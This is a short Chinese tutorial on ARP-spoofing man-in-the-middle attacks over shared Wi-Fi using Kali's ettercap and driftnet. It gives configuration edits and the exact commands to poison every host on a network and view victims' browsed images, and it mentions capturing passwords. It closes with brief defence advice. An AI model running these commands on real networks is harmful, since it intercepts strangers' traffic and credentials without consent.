中间人攻击可以知道两台计算机之间通信,简单说当你连上wifi浏览网页的时候,同时连上这个wifi的另一个人可以用一些技术手段看到你和互联网服务器之间的通信。通过这个例子,很容易就知道他的危害了。
使用的工具:kali系统中的ettercap、driftnet
使用前准备
1.第一次要先进行kali配置,配置文件是/etc/ettercap/etter.conf。
2.首先你要将ec_uid 、ec_gid都变为0,然后找到linux分类下的if you use iptables这一行,将注 释(“#”号)去掉。
2./etc/NetworkManager/NetworkManager.conf 修改为true
3.service network-manager restart
开始攻击
kail和手机连上同一个wifi,然后浏览网页
在kail终端输入 ettercap -i eth0 -Tq -M arp:remote -q /// ///
在打开一个终端运行 driftnet -i eth0 测试是否成功
当你可以在driftnet上看到手机上浏览的图片时,说明欺骗成功,在通过一些其它的方法可以进一步得到更多的信息。甚至当你在手机的网页上输入账号和密码时,也可以被黑客知道。
防护方法
尽量不要连公共wifi
在连上的wifi出现安全证书有问题时,果断不连。
领取专属 10元无门槛券
私享最新 技术干货